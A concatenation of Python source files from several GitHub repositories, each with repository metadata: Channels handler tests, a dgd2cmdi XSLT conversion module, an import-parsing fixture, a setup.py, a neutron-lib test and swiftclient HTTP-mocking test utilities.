        response = JsonResponse({'foo': (1, 2)})
        handler = FakeAsgiHandler(response)
        reply_messages = list(handler(self.get_next_message("test", require=True)))
        self.assertEqual(len(reply_messages), 1)
        self.assertEqual(reply_messages[0]['content'], b'{"foo": [1, 2]}')

    def test_redirect(self):
        # Relative, parent-relative and absolute redirect targets must all
        # come back as a 302 with a matching Location header.
        for redirect_to in ['/', '..', 'https://example.com']:
            Channel("test").send({
                "reply_channel": "test",
                "http_version": "1.1",
                "method": "GET",
                "path": b"/test/",
            })
            response = HttpResponseRedirect(redirect_to)
            handler = FakeAsgiHandler(response)
            reply_messages = list(handler(self.get_next_message("test", require=True)))
            self.assertEqual(reply_messages[0]['status'], 302)
            header_dict = dict(reply_messages[0]['headers'])
            self.assertEqual(header_dict[b'Location'].decode(), redirect_to)
| {
"content_hash": "02fbd9fc1bb58ca51c052eb5fd781ba8",
"timestamp": "",
"source": "github",
"line_count": 355,
"max_line_length": 109,
"avg_line_length": 37.859154929577464,
"alnum_prop": 0.5759672619047619,
"repo_name": "Krukov/channels",
"id": "ffecf8bb7910ee947e9b4982f03c9b4c48035558",
"size": "13440",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_handler.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "30339"
},
{
"name": "Makefile",
"bytes": "424"
},
{
"name": "Python",
"bytes": "252412"
}
],
"symlink_target": ""
} |
"""
This module provides methods to read the configuration file,
process the referenced resources and
"""
import argparse
import codecs
import os
import subprocess
import yaml
import cmdiresource
import cmdiheader
from lxml import etree
# Command line interface: a single positional argument naming a YAML file
# that lists the resources (corpus, event, speaker paths) to transform.
PARSER = argparse.ArgumentParser()
PARSER.add_argument(
    'resources',
    help='a file containing paths of a resource (corpus, event, speaker) to transform'
)
def main():
    """
    Entry point: parse the CLI arguments, load the YAML resource
    configuration and run the transformation.

    :return: None
    """
    args = PARSER.parse_args()
    with codecs.open(args.resources, mode='r', encoding='utf-8') as resfile:
        resources = yaml.safe_load(resfile)
    # hand the resource references over to the transformation pipeline
    transform(resources)
def transform_par(processor, stylesheets, collection, transcripts, outputinter, outputfinal):
"""
starts transformation by using command line parameters and not a config file
:param processor:
:param stylesheets:
:param collection:
:param transcripts:
:param outputinter:
:param outputfinal:
:return:
"""
outputinter_corpus = os.path.join(outputinter, 'corpora')
outputinter_events = os.path.join(outputinter, 'events')
outputinter_speakers = os.path.join(outputinter, 'speakers')
# create folders for intermediate results if neccessary
if not os.path.isdir(outputinter_corpus):
os.makedirs(outputinter_corpus)
elif not os.path.isdir(outputinter_events):
os.makedirs(outputinter_events)
elif not os.path.isdir(outputinter_speakers):
os.makedirs(outputinter_speakers)
# create folders for final results if neccessary
if not os.path.isdir(outputfinal):
os.makedirs(outputfinal)
for resource in collection:
corpus_inpath = collection.get(resource).get('corpus')
events_inpath = collection.get(resource).get('event')
speakers_inpath = collection.get(resource).get('speaker')
outputfolder_corpus = outputinter_corpus
outputfolder_event = prepare_cpath(outputinter_events, resource)
outputfolder_speaker = prepare_cpath(outputinter_speakers, resource)
event_iterator = FileIterator(events_inpath, 'event')
speaker_iterator = FileIterator(speakers_inpath, 'speaker')
call_processor(corpus_inpath, 'corpus', stylesheets, processor,
outputfolder_corpus)
for event_resourcefile in event_iterator:
call_processor(event_resourcefile, 'event', stylesheets, processor,
outputfolder_event)
for speaker_resourcefile in speaker_iterator:
call_processor(speaker_resourcefile, 'speaker', stylesheets,
processor, outputfolder_speaker)
print "xslt transformation for {} finished.".format(resource)
finalize_resources(outputinter_corpus, outputinter_events,
outputinter_speakers, transcripts, outputfinal)
def transform(resources):
"""
calls the processor and refers to all resources
given in the configuration file.
"""
# define vars from samples file
processor = resources['processor']
stylesheets = resources['stylesheets']
collection = resources['collection']
transcripts = resources['transcripts']
outputinter = resources['output-inter']
outputinter_corpus = os.path.join(outputinter, 'corpora')
outputinter_events = os.path.join(outputinter, 'events')
outputinter_speakers = os.path.join(outputinter, 'speakers')
# create folders for intermediate results if neccessary
if not os.path.isdir(outputinter_corpus):
os.makedirs(outputinter_corpus)
elif not os.path.isdir(outputinter_events):
os.makedirs(outputinter_events)
elif not os.path.isdir(outputinter_speakers):
os.makedirs(outputinter_speakers)
outputfinal = resources['output-final']
# create folders for final results if neccessary
if not os.path.isdir(outputfinal):
os.makedirs(outputfinal)
for resource in collection:
corpus_inpath = collection.get(resource).get('corpus')
events_inpath = collection.get(resource).get('event')
speakers_inpath = collection.get(resource).get('speaker')
outputfolder_corpus = outputinter_corpus
outputfolder_event = prepare_cpath(outputinter_events, resource)
outputfolder_speaker = prepare_cpath(outputinter_speakers, resource)
event_iterator = FileIterator(events_inpath, 'event')
speaker_iterator = FileIterator(speakers_inpath, 'speaker')
call_processor(corpus_inpath, 'corpus', stylesheets, processor,
outputfolder_corpus)
for event_resourcefile in event_iterator:
call_processor(event_resourcefile, 'event', stylesheets, processor,
outputfolder_event)
for speaker_resourcefile in speaker_iterator:
call_processor(speaker_resourcefile, 'speaker', stylesheets,
processor, outputfolder_speaker)
print "xslt transformation for {} finished.".format(resource)
finalize_resources(outputinter_corpus, outputinter_events,
outputinter_speakers, transcripts, outputfinal)
def call_inline_processor(metafilepath, resourcetype, stylesheetdic, processor,
                         outputpath):
    """
    transforms resources inline by using
    subprocess and parsing the processor's stdout
    with etree.
    returns a dictionary with filename key and etree value

    :raises ValueError: if *resourcetype* is not 'corpus', 'event' or 'speaker'
    """
    # The three original branches were identical except for the stylesheet
    # lookup key, so they are collapsed into a single code path.
    if resourcetype not in ('corpus', 'event', 'speaker'):
        raise ValueError("unknown resource type: {}".format(resourcetype))
    metafilepath = os.path.abspath(metafilepath)
    processor = os.path.abspath(processor)
    stylesheetpath = os.path.abspath(stylesheetdic.get(resourcetype))
    # NOTE(review): shell=True with interpolated paths breaks on spaces and
    # is unsafe for untrusted paths; prefer an argument list with shell=False.
    command = "java -jar {} -s:{} -xsl:{}".format(processor, metafilepath,
                                                  stylesheetpath)
    process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
    process.wait()
    # Parse the transformed XML straight off the processor's stdout.
    return {os.path.basename(metafilepath): etree.parse(process.stdout)}
def call_processor(metafilepath, resourcetype, stylesheetdic, processor,
                   outputpath):
    """
    Run the XSLT processor on one resource instance, writing the result to
    <outputpath>/<metafile-basename-without-extension>.cmdi.

    :param metafilepath: path of the resource's metadata file
    :param resourcetype: 'corpus', 'event' or 'speaker'; selects the
        stylesheet from stylesheetdic
    :param stylesheetdic: maps resource type -> stylesheet path
    :param processor: path of the XSLT processor jar
    :param outputpath: directory receiving the generated .cmdi file
    :raises ValueError: if resourcetype is not one of the three known types
    """
    metafilepath = os.path.abspath(metafilepath)
    processor = os.path.abspath(processor)
    # All three branches of the original ran the identical command and only
    # differed in the stylesheet lookup key, so they are merged here.
    if resourcetype not in ('corpus', 'event', 'speaker'):
        raise ValueError()
    stylesheetpath = os.path.abspath(stylesheetdic.get(resourcetype))
    outputpath = os.path.abspath(outputpath)
    outputfile = os.path.join(
        outputpath, os.path.basename(metafilepath).split('.')[0] + '.cmdi')
    # NOTE(review): os.system with interpolated paths is fragile (spaces,
    # metacharacters); subprocess with an argv list would be safer.
    os.system("java -jar {} -s:{} -xsl:{} -o:{}".format(
        processor, metafilepath, stylesheetpath, outputfile))
def finalize_resources(corpus, event, speaker, transcripts, finaldir):
    """The final step adding resource proxies, cmdi headers and speaker
    informations in event metafiles.

    Builds a ResourceTreeCollection over the corpus/event/speaker files,
    assigns each node an id of the form <corpuslabel>_<counter>, wires up
    resource proxies and part-of relations, merges speaker data into the
    event files, and finally writes one CMDI file set per corpus label
    into *finaldir*.
    """
    # define corpuslabels
    # (label is the filename prefix before the first underscore)
    clabels = [fn.split('_')[0] for fn in os.listdir(corpus)]
    # build resource tree
    print "building resource tree..."
    restree = cmdiresource.ResourceTreeCollection(corpus, event, speaker,
                                                  transcripts)
    counter = 0
    # create ids
    # every node gets a unique "<corpuslabel>_<running number>" id
    for node in restree.nodes_iter():
        corpuslabel = node.split('_')[0]
        restree.node.get(node).update({'id': corpuslabel + '_' + str(counter)})
        counter += 1
    # build resource-proxies for documents
    print "defining resource proxies..."
    restree.build_resourceproxy()
    # define is-part relations
    print "building part relations..."
    for nodename in restree.nodes_iter():
        if restree.node.get(nodename).get('type') == 'event':
            restree.define_parts(nodename)
        elif restree.node.get(nodename).get('type') == 'corpus':
            restree.define_parts(nodename)
    # merge speaker info to events
    print "merging speaker data to events..."
    for nodename, ndata in restree.nodes_iter(data=True):
        if ndata.get('type') == 'speaker':
            restree.speaker2event(nodename)
    # write cmdi etrees to files
    for cl in clabels:
        print "writing finalized cmdi files for {}".format(cl)
        write2cmdi(restree, cl, finaldir)
# -------------------------------
# helper methods and classes
# -------------------------------
def prepare_cpath(outfolder, cname):
    """
    Return the path of the resource collection directory named after the
    corpus label *cname*, creating the directory first if it is missing.
    """
    target = os.path.join(outfolder, cname)
    if not os.path.isdir(target):
        os.makedirs(target)
    return target
def write2cmdi(restree, corpus, outpath):
    """Write finalized CMDI files for every corpus and event node that
    belongs to *corpus*.

    Creates <outpath>/<corpus>/ if necessary, then for each matching node
    builds its CMDI header and serializes it to <node>.cmdi inside that
    directory.
    """
    outpathfinal = os.path.abspath(os.path.join(outpath, corpus))
    if not os.path.isdir(outpathfinal):
        os.mkdir(os.path.join(outpath, corpus))
    for nodename, ndata in restree.nodes_iter(data=True):
        # The original's 'event' and 'corpus' branches were byte-identical,
        # so they are folded into a single membership test.
        if (ndata.get('type') in ('event', 'corpus')
                and ndata.get('corpus') == corpus):
            cmdiheader.define_header(nodename, restree)
            restree._write_cmdi(
                nodename, os.path.join(outpathfinal, nodename) + '.cmdi')
class FileIterator(object):
    """
    Iterator initialized with a corpus path.

    Yields the absolute path of each entry in the directory; for event and
    speaker resources the entries are the corpus label directories.
    """

    def __init__(self, resourcepath, resourcetype):
        self.resourcepath = os.path.abspath(resourcepath)
        self.resourcetype = resourcetype
        self._files_iter = iter(os.listdir(self.resourcepath))

    def __iter__(self):
        return self

    def next(self):
        """
        Return the absolute path of the next directory entry.
        """
        # Use the next() builtin instead of the Python-2-only .next()
        # method so the class also works on Python 3 iterators.
        file_name = next(self._files_iter)
        return os.path.join(self.resourcepath, file_name)

    # Python 3 iterator protocol alias; keeps `next` for legacy callers.
    __next__ = next
| {
"content_hash": "256e747a4a10b0a9d56a3c6f94c69dd7",
"timestamp": "",
"source": "github",
"line_count": 360,
"max_line_length": 93,
"avg_line_length": 34.522222222222226,
"alnum_prop": 0.6338107499195366,
"repo_name": "fkuhn/dgd2cmdi",
"id": "54b434aa452e5937a4904961616edb45986efa0a",
"size": "12428",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/dgd2cmdi/dgd2cmdi.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "63662"
},
{
"name": "XSLT",
"bytes": "55246"
}
],
"symlink_target": ""
} |
from os import path
from . import path
from .. import path
from ..foo import path
from os import path as shmath
import os
import sys, os
import os.path
import os.path as path2
import os.path, dir.foo
| {
"content_hash": "95fc166cb31fb7453ed15b08d3983fe7",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 29,
"avg_line_length": 20,
"alnum_prop": 0.765,
"repo_name": "rocky/python-spark",
"id": "9b0ff6f43071395079a9284577996e78cb657bf4",
"size": "819",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "example/python2/test/parse/imports.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3365"
},
{
"name": "Makefile",
"bytes": "1967"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "171292"
},
{
"name": "Shell",
"bytes": "3576"
}
],
"symlink_target": ""
} |
from setuptools import find_packages, setup
def with_versioneer(f, default=None):
    """Attempts to execute the supplied single-arg function by passing it
    versioneer if available; else, returns the default.
    """
    try:
        import versioneer
        result = f(versioneer)
    except ModuleNotFoundError:
        result = default
    return result
def readme():
    """Return the contents of README.md, or None if it cannot be read."""
    try:
        with open('README.md') as fobj:
            content = fobj.read()
    except Exception:
        return None
    return content
# NOTE(review): this constant says 0.1.0 while REQUIRED_PACKAGES pins
# casfs==0.1.1 below — confirm which version is intended.
CASFS_VERSION = "0.1.0"

# Runtime dependencies installed alongside uv-metrics.
REQUIRED_PACKAGES = [
    "casfs==0.1.1",
    "fs",
    "fs-gcsfs",
    "mlflow==1.10.0",
    "numpy>=1.18.0",
    "sqlalchemy",
    "tqdm>=4.42.1",
    "google-cloud-pubsub>=1.7.0",
]

# Package metadata; version and cmdclass come from versioneer when it is
# importable and fall back to None / {} otherwise (see with_versioneer).
setup(name='uv-metrics',
      version=with_versioneer(lambda v: v.get_version()),
      cmdclass=with_versioneer(lambda v: v.get_cmdclass(), {}),
      description='Composable metric reporters in Python.',
      long_description=readme(),
      long_description_content_type="text/markdown",
      python_requires='>=3.6.0',
      author='Sam Ritchie',
      author_email='samritchie@google.com',
      url='https://github.com/google/uv-metrics',
      license='Apache-2.0',
      packages=find_packages(exclude=('tests', 'docs')),
      install_requires=REQUIRED_PACKAGES,
      # Optional TensorFlow backends: pip install uv-metrics[tf] / [tf-gpu]
      extras_require={
          "tf": ["tensorflow"],
          "tf-gpu": ["tensorflow-gpu"],
      },
      include_package_data=True,
      entry_points={
          'console_scripts': [
              'mlflow_subscriber = uv.resources.mlflow_subscriber:main',
          ]
      })
| {
"content_hash": "4d108341a000a53268630e7c4e7b005f",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 72,
"avg_line_length": 25.896551724137932,
"alnum_prop": 0.6158455392809588,
"repo_name": "google/uv-metrics",
"id": "fca1e1711ba4abfa5030393001017641c41c013f",
"size": "2097",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1632"
},
{
"name": "Python",
"bytes": "247575"
}
],
"symlink_target": ""
} |
from neutron_lib.api.definitions import subnet_onboard
from neutron_lib.tests.unit.api.definitions import base
class OnboardSubnetDefinitionTestCase(base.DefinitionBaseTestCase):
    """Exercises the subnet_onboard API definition through the shared
    DefinitionBaseTestCase checks."""
    extension_module = subnet_onboard
    # The extension adds no new resource attributes.
    extension_attributes = ()
| {
"content_hash": "8142ff81b604e18a2aa8350d56e491d8",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 67,
"avg_line_length": 35.57142857142857,
"alnum_prop": 0.8152610441767069,
"repo_name": "openstack/neutron-lib",
"id": "5fd4240c4ad378c5ac9688e80d3b33ef49df75e9",
"size": "822",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "neutron_lib/tests/unit/api/definitions/test_subnet_onboard.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "3459"
},
{
"name": "HTML",
"bytes": "31248"
},
{
"name": "Python",
"bytes": "1522390"
},
{
"name": "Shell",
"bytes": "6100"
}
],
"symlink_target": ""
} |
import functools
import io
import importlib
import os
import sys
from time import sleep
import unittest
from unittest import mock
from requests import RequestException
from requests.structures import CaseInsensitiveDict
from urllib.parse import urlparse, ParseResult
from swiftclient import client as c
from swiftclient import shell as s
from swiftclient.utils import EMPTY_ETAG
def fake_get_auth_keystone(expected_os_options=None, exc=None,
                           storage_url='http://url/', token='token',
                           **kwargs):
    """Build a fake replacement for swiftclient's keystone auth function.

    The returned callable mimics get_auth_keystone(auth_url, user, key,
    os_options, **kwargs): it returns (storage_url, token) on success and
    ("", None) when the supplied os_options or required kwargs do not match
    the expectations configured here.

    :param expected_os_options: os_options the caller must supply; any
        non-empty mismatching value yields the failure tuple
    :param exc: exception class to raise immediately when the fake is called
    :param storage_url: storage URL handed back on success
    :param token: auth token handed back on success
    :param kwargs: may contain 'required_kwargs', a dict of keyword
        arguments the caller must pass through unchanged
    """
    def fake_get_auth_keystone(auth_url,
                               user,
                               key,
                               actual_os_options, **actual_kwargs):
        if exc:
            raise exc('test')
        # TODO: some way to require auth_url, user and key?
        if expected_os_options:
            # Loop variables renamed from key/value: the original loop
            # shadowed the `key` (credential) parameter above.
            for opt_name, opt_value in actual_os_options.items():
                if opt_value and opt_value != expected_os_options.get(
                        opt_name):
                    return "", None
        if 'required_kwargs' in kwargs:
            for k, v in kwargs['required_kwargs'].items():
                if v != actual_kwargs.get(k):
                    return "", None

        # TLS failure modes are simulated via magic auth_url suffixes.
        if auth_url.startswith("https") and \
                auth_url.endswith("invalid-certificate") and \
                not actual_kwargs['insecure']:
            from swiftclient import client as c
            raise c.ClientException("invalid-certificate")
        if auth_url.startswith("https") and \
                auth_url.endswith("self-signed-certificate") and \
                not actual_kwargs['insecure'] and \
                actual_kwargs['cacert'] is None:
            from swiftclient import client as c
            raise c.ClientException("unverified-certificate")
        if auth_url.startswith("https") and \
                auth_url.endswith("client-certificate") and \
                not (actual_kwargs['cert'] and actual_kwargs['cert_key']):
            from swiftclient import client as c
            raise c.ClientException("noclient-certificate")

        return storage_url, token
    return fake_get_auth_keystone
class StubResponse(object):
    """
    Simple bag of response attributes (status, body, headers) that
    fake_http_connect's code_iter can yield to customize a single
    response on a per-request basis.
    """

    def __init__(self, status=200, body='', headers=None):
        self.status = status
        self.body = body
        self.headers = headers or {}

    def __repr__(self):
        return '{}({!r}, {!r}, {!r})'.format(
            type(self).__name__, self.status, self.body, self.headers)
def fake_http_connect(*code_iter, **kwargs):
    """
    Generate a callable which yields a series of stubbed responses. Because
    swiftclient will reuse an HTTP connection across pipelined requests it is
    not always the case that this fake is used strictly for mocking an HTTP
    connection, but rather each HTTP response (i.e. each call to requests
    get_response).

    Each positional argument is either an int status code or a StubResponse;
    behavior is further tweaked through kwargs such as 'etags', 'timestamps',
    'missing_container', 'slow', 'headers', 'auth_v1', 'body', 'raise_exc',
    'give_content_type' and 'give_connect'.
    """
    class FakeConn(object):
        # Stand-in for a requests response/connection object.
        def __init__(self, status, etag=None, body='', timestamp='1',
                     headers=None):
            self.status_code = self.status = status
            self.reason = 'Fake'
            self.scheme = 'http'
            self.host = '1.2.3.4'
            self.port = '1234'
            # counters used by the 'slow' mode below
            self.sent = 0
            self.received = 0
            self.etag = etag
            self.content = self.body = body
            self.timestamp = timestamp
            self.headers = headers or {}
            self.request = None
            self._closed = False

        def getresponse(self):
            # 'raise_exc' simulates a connection-level failure.
            if kwargs.get('raise_exc'):
                raise Exception('test')
            return self

        def getheaders(self):
            # Explicit headers (from a StubResponse) win outright;
            # otherwise synthesize a plausible default header set.
            if self.headers:
                return self.headers.items()
            headers = {'content-length': str(len(self.body)),
                       'content-type': 'x-application/test',
                       'x-timestamp': self.timestamp,
                       'last-modified': self.timestamp,
                       'x-object-meta-test': 'testing',
                       'etag':
                       self.etag or '"%s"' % EMPTY_ETAG,
                       'x-works': 'yes',
                       'x-account-container-count': '12345'}
            if not self.timestamp:
                del headers['x-timestamp']
            try:
                # missing_container entries toggle this per response
                if next(container_ts_iter) is False:
                    headers['x-container-timestamp'] = '1'
            except StopIteration:
                pass
            if 'slow' in kwargs:
                headers['content-length'] = '4'
            if 'headers' in kwargs:
                headers.update(kwargs['headers'])
            if 'auth_v1' in kwargs:
                headers.update(
                    {'x-storage-url': 'storageURL',
                     'x-auth-token': 'someauthtoken'})
            return headers.items()

        def read(self, amt=None):
            # 'slow' mode drips out single spaces with a delay to
            # exercise timeout handling.
            if 'slow' in kwargs:
                if self.sent < 4:
                    self.sent += 1
                    sleep(0.1)
                    return ' '
            rv = self.body[:amt]
            if amt is not None:
                self.body = self.body[amt:]
            else:
                self.body = ''
            return rv

        def send(self, amt=None):
            # Mirrors read(): simulate a slow upload path.
            if 'slow' in kwargs:
                if self.received < 4:
                    self.received += 1
                    sleep(0.1)

        def getheader(self, name, default=None):
            return dict(self.getheaders()).get(name.lower(), default)

        def close(self):
            self._closed = True

    # Per-response iterators, padded to match the number of stubbed codes.
    timestamps_iter = iter(kwargs.get('timestamps') or ['1'] * len(code_iter))
    etag_iter = iter(kwargs.get('etags') or [None] * len(code_iter))
    x = kwargs.get('missing_container', [False] * len(code_iter))
    if not isinstance(x, (tuple, list)):
        x = [x] * len(code_iter)
    container_ts_iter = iter(x)
    code_iter = iter(code_iter)

    def connect(*args, **ckwargs):
        # Optional observation hooks for the caller.
        if 'give_content_type' in kwargs:
            if len(args) >= 7 and 'Content-Type' in args[6]:
                kwargs['give_content_type'](args[6]['Content-Type'])
            else:
                kwargs['give_content_type']('')
        if 'give_connect' in kwargs:
            kwargs['give_connect'](*args, **ckwargs)
        status = next(code_iter)
        if isinstance(status, StubResponse):
            fake_conn = FakeConn(status.status, body=status.body,
                                 headers=status.headers)
        else:
            etag = next(etag_iter)
            timestamp = next(timestamps_iter)
            fake_conn = FakeConn(status, etag, body=kwargs.get('body', ''),
                                 timestamp=timestamp)
        # Non-positive status codes simulate transport-level errors.
        if fake_conn.status <= 0:
            raise RequestException()
        return fake_conn
    # Exposed so tests can verify all stubbed responses were consumed.
    connect.code_iter = code_iter

    return connect
class MockHttpTest(unittest.TestCase):
    """Base test case that patches swiftclient's HTTP layer with
    fake_http_connect-backed stubs and records every request made so that
    subclasses can assert on them (see assertRequests/assert_request)."""

    def setUp(self):
        super(MockHttpTest, self).setUp()
        self.fake_connect = None
        self.request_log = []

        # Capture output, since the test-runner stdout/stderr monkey-patching
        # won't cover the references to sys.stdout/sys.stderr in
        # swiftclient.multithreading
        self.capture_output = CaptureOutput()
        if 'SWIFTCLIENT_DEBUG' not in os.environ:
            self.capture_output.__enter__()
            self.addCleanup(self.capture_output.__exit__)

            # since we're going to steal all stderr output globally; we should
            # give the developer an escape hatch or risk scorn
            def blowup_but_with_the_helpful(*args, **kwargs):
                raise Exception(
                    "You tried to enter a debugger while stderr is "
                    "patched, you need to set SWIFTCLIENT_DEBUG=1 "
                    "and try again")
            import pdb
            pdb.set_trace = blowup_but_with_the_helpful

        def fake_http_connection(*args, **kwargs):
            # Each call installs a fresh set of stubbed responses and
            # resets the request log; unconsumed stubs from a previous
            # installation fail the test.
            self.validateMockedRequestsConsumed()
            self.request_log = []
            self.fake_connect = fake_http_connect(*args, **kwargs)
            _orig_http_connection = c.http_connection
            query_string = kwargs.get('query_string')
            storage_url = kwargs.get('storage_url')
            auth_token = kwargs.get('auth_token')
            exc = kwargs.get('exc')
            on_request = kwargs.get('on_request')

            def wrapper(url, proxy=None, cacert=None, insecure=False,
                        cert=None, cert_key=None,
                        ssl_compression=True, timeout=None):
                if storage_url:
                    self.assertEqual(storage_url, url)

                # Reuse the real parser for the URL, but swap the
                # connection object for a recording fake.
                parsed, _conn = _orig_http_connection(url, proxy=proxy)

                class RequestsWrapper(object):
                    def close(self):
                        if hasattr(self, 'resp'):
                            self.resp.close()
                conn = RequestsWrapper()

                def request(method, path, *args, **kwargs):
                    try:
                        conn.resp = self.fake_connect()
                    except StopIteration:
                        self.fail('Unexpected %s request for %s' % (
                            method, path))
                    self.request_log.append((parsed, method, path, args,
                                             kwargs, conn.resp))
                    conn.host = conn.resp.host
                    conn.resp.request = RequestsWrapper()
                    conn.resp.request.url = '%s://%s%s' % (
                        conn.resp.scheme, conn.resp.host, path)
                    # Track whether the body was ever consumed.
                    conn.resp.has_been_read = False
                    _orig_read = conn.resp.read

                    def read(*args, **kwargs):
                        conn.resp.has_been_read = True
                        return _orig_read(*args, **kwargs)
                    conn.resp.read = read

                    # Optional per-request hook may override the status.
                    if on_request:
                        status = on_request(method, path, *args, **kwargs)
                        conn.resp.status = status

                    if auth_token:
                        headers = args[1]
                        self.assertEqual(auth_token,
                                         headers.get('X-Auth-Token'))
                    if query_string:
                        self.assertTrue(path.endswith('?' + query_string))
                    if path.endswith('invalid_cert') and not insecure:
                        from swiftclient import client as c
                        raise c.ClientException("invalid_certificate")
                    if exc:
                        raise exc
                    return conn.resp

                def putrequest(path, data=None, headers=None, **kwargs):
                    request('PUT', path, data, headers, **kwargs)

                conn.request = request
                conn.putrequest = putrequest

                def getresponse():
                    return conn.resp
                conn.getresponse = getresponse
                return parsed, conn
            return wrapper
        self.fake_http_connection = fake_http_connection

    def iter_request_log(self):
        # Yield each logged request as a dict convenient for assertions.
        for parsed, method, path, args, kwargs, resp in self.request_log:
            parts = parsed._asdict()
            parts['path'] = path
            full_path = ParseResult(**parts).geturl()
            args = list(args)
            log = dict(zip(('body', 'headers'), args))
            log.update({
                'method': method,
                'full_path': full_path,
                'parsed_path': urlparse(full_path),
                'path': path,
                'headers': CaseInsensitiveDict(log.get('headers')),
                'resp': resp,
                'status': resp.status,
            })
            yield log

    # Kept so assert_request_equal can use the unmodified assertEqual even
    # if a subclass overrides assertEqual.
    orig_assertEqual = unittest.TestCase.assertEqual

    def assert_request_equal(self, expected, real_request):
        """Compare one expected (method, path[, body[, headers]]) tuple
        against one logged request."""
        method, path = expected[:2]
        if urlparse(path).scheme:
            # An absolute URL in the expectation matches the full path.
            match_path = real_request['full_path']
        else:
            match_path = real_request['path']
        self.assertEqual((method, path), (real_request['method'],
                                          match_path))
        if len(expected) > 2:
            body = expected[2]
            real_request['expected'] = body
            err_msg = 'Body mismatch for %(method)s %(path)s, ' \
                'expected %(expected)r, and got %(body)r' % real_request
            self.orig_assertEqual(body, real_request['body'], err_msg)

        if len(expected) > 3:
            headers = CaseInsensitiveDict(expected[3])
            for key, value in headers.items():
                real_request['key'] = key
                real_request['expected_value'] = value
                real_request['value'] = real_request['headers'].get(key)
                err_msg = (
                    'Header mismatch on %(key)r, '
                    'expected %(expected_value)r and got %(value)r '
                    'for %(method)s %(path)s %(headers)r' % real_request)
                self.orig_assertEqual(value, real_request['value'],
                                      err_msg)
            # Any header not listed in the expectation is an error.
            real_request['extra_headers'] = dict(
                (key, value) for key, value in real_request['headers'].items()
                if key not in headers)
            if real_request['extra_headers']:
                self.fail('Received unexpected headers for %(method)s '
                          '%(path)s, got %(extra_headers)r' % real_request)

    def assertRequests(self, expected_requests):
        """
        Make sure some requests were made like you expected, provide a list of
        expected requests, typically in the form of [(method, path), ...]
        or [(method, path, body, headers), ...]
        """
        real_requests = self.iter_request_log()
        for expected in expected_requests:
            real_request = next(real_requests)
            self.assert_request_equal(expected, real_request)
        try:
            real_request = next(real_requests)
        except StopIteration:
            pass
        else:
            self.fail('At least one extra request received: %r' %
                      real_request)

    def assert_request(self, expected_request):
        """
        Make sure a request was made as expected. Provide the
        expected request in the form of [(method, path), ...]
        """
        real_requests = self.iter_request_log()
        for real_request in real_requests:
            try:
                self.assert_request_equal(expected_request, real_request)
                break
            except AssertionError:
                pass
        else:
            raise AssertionError(
                "Expected request %s not found in actual requests %s"
                % (expected_request, self.request_log)
            )

    def validateMockedRequestsConsumed(self):
        # Fail if any stubbed response installed via fake_http_connection
        # was never requested.
        if not self.fake_connect:
            return
        unused_responses = list(self.fake_connect.code_iter)
        if unused_responses:
            self.fail('Unused responses %r' % (unused_responses,))

    def tearDown(self):
        self.validateMockedRequestsConsumed()
        super(MockHttpTest, self).tearDown()
        # TODO: this nuke from orbit clean up seems to be encouraging
        # un-hygienic mocking on the swiftclient.client module; which may lead
        # to some unfortunate test order dependency bugs by way of the broken
        # window theory if any other modules are similarly patched
        importlib.reload(c)
class CaptureStreamPrinter(object):
    """
    Test helper that accepts str or bytes and forwards utf-8 encoded
    bytes to the wrapped capture stream (used to exercise unicode
    writing on PY3).
    """

    def __init__(self, captured_stream):
        self._captured_stream = captured_stream

    def write(self, data):
        # Normalize to bytes without decoding: str payloads are encoded
        # as utf-8, byte payloads pass through unchanged.
        if not isinstance(data, bytes):
            data = data.encode('utf8')
        self._captured_stream.write(data)
class CaptureStream(object):
    """File-like replacement for a real stream (stdout/stderr) that
    records everything written into an in-memory bytes buffer.

    Writes fan out to every entry in ``self.streams``; by default that is
    a single CaptureStreamPrinter targeting the internal buffer, but
    callers may append further sinks.
    """

    def __init__(self, stream):
        # The real stream being replaced; kept so callers can reach it.
        self.stream = stream
        self._buffer = io.BytesIO()
        self._capture = CaptureStreamPrinter(self._buffer)
        self.streams = [self._capture]

    @property
    def buffer(self):
        """The raw BytesIO holding everything captured so far."""
        return self._buffer

    def flush(self):
        """No-op: the in-memory buffer needs no flushing."""
        pass

    def write(self, *args, **kwargs):
        for stream in self.streams:
            stream.write(*args, **kwargs)

    def writelines(self, lines):
        # Materialize once so a generator argument can be replayed to
        # every sink.
        lines = list(lines)
        for stream in self.streams:
            sink_writelines = getattr(stream, 'writelines', None)
            if sink_writelines is not None:
                sink_writelines(lines)
            else:
                # Bug fix: CaptureStreamPrinter defines only write(), so the
                # original blind ``stream.writelines(...)`` delegation raised
                # AttributeError; fall back to writing line by line.
                for line in lines:
                    stream.write(line)

    def getvalue(self):
        """Return all captured bytes."""
        return self._buffer.getvalue()

    def clear(self):
        """Discard everything captured so far."""
        self._buffer.truncate(0)
        self._buffer.seek(0)
class CaptureOutput(object):
    """Context manager that swaps sys.stdout/sys.stderr (and swiftclient's
    OutputManager streams) for in-memory CaptureStreams.

    Instances also proxy string operations to the captured stdout text,
    so tests can compare a CaptureOutput directly against a string.
    """

    def __init__(self, suppress_systemexit=False):
        self._out = CaptureStream(sys.stdout)
        self._err = CaptureStream(sys.stderr)
        WrappedOutputManager = functools.partial(s.OutputManager,
                                                 print_stream=self._out,
                                                 error_stream=self._err)
        self.patchers = []
        if suppress_systemexit:
            # Pretend no errors were recorded so shell commands do not
            # exit with a nonzero status during tests.
            self.patchers.append(
                mock.patch('swiftclient.shell.OutputManager.get_error_count',
                           return_value=0))
        self.patchers.extend([
            mock.patch('swiftclient.shell.OutputManager',
                       WrappedOutputManager),
